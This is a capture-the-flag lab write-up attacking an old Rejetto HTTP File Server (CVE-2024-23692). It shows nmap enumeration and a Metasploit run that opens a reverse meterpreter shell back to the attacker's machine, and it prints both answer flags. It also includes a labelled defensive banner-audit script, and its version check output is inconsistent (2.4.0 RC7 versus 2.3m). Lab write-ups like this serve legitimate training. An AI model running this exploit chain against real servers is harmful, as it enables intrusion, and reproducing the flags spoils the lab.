Parrot CTFs Machine Writeup
Machine Details
Lab Machine Name: Rejetto
Date: May 5, 2025
Prepared By: Hitesh Sharma
Challenge Author(s): Hitesh Sharma
Difficulty: Easy
Machine Flags:
User :- PCTF{3eef03a19869445fca567aaf308bf7fc}
Root :- PCTF{a43ca7db63fc55e67aa50e135556e720}
Machine Description
Description: A classic file-sharing service hums along, offering simple access to a few public
resources. It looks stable, even nostalgic, perhaps a relic from another era. But age often brings
oversight. Explore its behavior, peek into its features, and you might just find something that
wasn’t meant to be shared.
Skills Required: Windows CMD, PowerShell, Kali Linux, Metasploit
Skills Learned: Windows Privilege Escalation, Windows Exploitation, Metasploit C2
Business Confidential
Enumeration
- Start with an nmap scan to enumerate the open ports on the target.
o ┌──(kali㉿kali)-[~]
o └─$ nmap -sC -sV -p- 192.168.248.148 --min-rate=1500
o Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-02 11:29 EDT
o Stats: 0:00:02 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
o
o Nmap scan report for 192.168.248.148
o Host is up (0.0011s latency).
o Not shown: 65522 closed tcp ports (reset)
o PORT STATE SERVICE VERSION
o 80/tcp open http HttpFileServer httpd 2.3m
o |_http-title: HFS /
o |_http-server-header: HFS 2.3m
o 135/tcp open msrpc Microsoft Windows RPC
o 139/tcp open netbios-ssn Microsoft Windows netbios-ssn
o 445/tcp open microsoft-ds?
o 5040/tcp open unknown
o 7680/tcp open pando-pub?
o 49664/tcp open msrpc Microsoft Windows RPC
o 49665/tcp open msrpc Microsoft Windows RPC
o 49666/tcp open msrpc Microsoft Windows RPC
o 49667/tcp open msrpc Microsoft Windows RPC
o 49668/tcp open msrpc Microsoft Windows RPC
o 49669/tcp open msrpc Microsoft Windows RPC
o 50076/tcp open msrpc Microsoft Windows RPC
o MAC Address: 00:0C:29:CF:DA:D5 (VMware)
o Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
o
o Host script results:
o | smb2-security-mode:
o | 3:1:1:
o |_ Message signing enabled but not required
o | smb2-time:
o | date: 2025-05-02T15:32:11
o |_ start_date: N/A
- The scan shows HttpFileServer httpd 2.3m running on port 80, which is the Rejetto HTTP File Server (HFS).
- Searching the internet, we find that this version is vulnerable to remote code execution, tracked as CVE-2024-23692 and listed on exploit-db as "Rejetto HTTP File Server 2.3m - Remote Code Execution (RCE)":
o https://www.exploit-db.com/exploits/52102
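The same banner that identifies the target here is what a defender can sweep for in their own scan results. The following is an added example, not part of the original writeup: it parses nmap normal output and reports hosts exposing an HFS 2.x banner, plus the "signing not required" SMB result seen in the scan above. The function name, the second sample host, and the choice to treat every HFS 2.x banner as in scope for CVE-2024-23692 are assumptions.

```python
import re

# Constructed sample in nmap's normal output format: the first host is reduced
# from the scan above, the second host is invented for contrast.
SAMPLE_SCAN = """\
Nmap scan report for 192.168.248.148
80/tcp    open  http         HttpFileServer httpd 2.3m
|_http-server-header: HFS 2.3m
445/tcp   open  microsoft-ds?
Host script results:
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled but not required
Nmap scan report for 192.0.2.10
80/tcp    open  http         nginx 1.24.0
|_http-server-header: nginx/1.24.0
"""

HOST_RE = re.compile(r"^Nmap scan report for (\S+)")
# Matches both the -sV version column and the http-server-header script line.
HFS_RE = re.compile(r"(?:HttpFileServer httpd|http-server-header: HFS) (\d+)\.(\S+)")


def audit(scan_text):
    """Return {host: [findings]} for every host in nmap normal output."""
    findings, host = {}, None
    for line in scan_text.splitlines():
        m = HOST_RE.match(line)
        if m:
            host = m.group(1)
            findings[host] = []
            continue
        if host is None:
            continue  # preamble before the first host block
        found = None
        m = HFS_RE.search(line)
        # Assumption: every HFS 2.x banner is in scope for CVE-2024-23692.
        if m and int(m.group(1)) == 2:
            found = "HFS %s.%s (CVE-2024-23692)" % m.groups()
        elif "Message signing enabled but not required" in line:
            found = "SMB signing not required"
        if found and found not in findings[host]:
            findings[host].append(found)
    return findings


if __name__ == "__main__":
    for host, items in audit(SAMPLE_SCAN).items():
        print(host, items or "no findings")
```

Because the check relies only on the advertised banner, a host that hides or rewrites its Server header needs a separate software inventory check.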
Exploitation
- Let’s start Metasploit and search for an exploitation module.
- Then select the module and set its options.
o msf6 > use exploit/windows/http/rejetto_hfs_rce_cve_2024_23692
o [*] No payload configured, defaulting to cmd/windows/http/x64/meterpreter/reverse_tcp
o msf6 exploit(windows/http/rejetto_hfs_rce_cve_2024_23692) > set RHOSTS 192.168.248.148
o RHOSTS => 192.168.248.148
o msf6 exploit(windows/http/rejetto_hfs_rce_cve_2024_23692) > set RPORT 80
o RPORT => 80
o msf6 exploit(windows/http/rejetto_hfs_rce_cve_2024_23692) > check
o [+] 192.168.248.148:80- The target is vulnerable. Rejetto HFS version 2.4.0 RC7
o msf6 exploit(windows/http/rejetto_hfs_rce_cve_2024_23692) > set LHOST eth0
o LHOST => eth0
o msf6 exploit(windows/http/rejetto_hfs_rce_cve_2024_23692) > set LPORT 4444
o LPORT => 4444
o msf6 exploit(windows/http/rejetto_hfs_rce_cve_2024_23692) > exploit
o [*] Started reverse TCP handler on 192.168.248.132:4444
o [*] Running automatic check ("set AutoCheck false" to disable)
o [+] The target is vulnerable. Rejetto HFS version 2.3m
o [*] Sending stage (203846 bytes) to 192.168.248.148
o [*] Meterpreter session 2 opened (192.168.248.132:4444 -> 192.168.248.148:49729) at 2025-05-02 12:27:22 -0400
o
o meterpreter > getuid
o Server username: REJETTO-HTTP-FI\jady
o meterpreter >
- We get a shell as jady, and after checking privileges we find that the account has administrative privileges, so we can now read the user and root flags.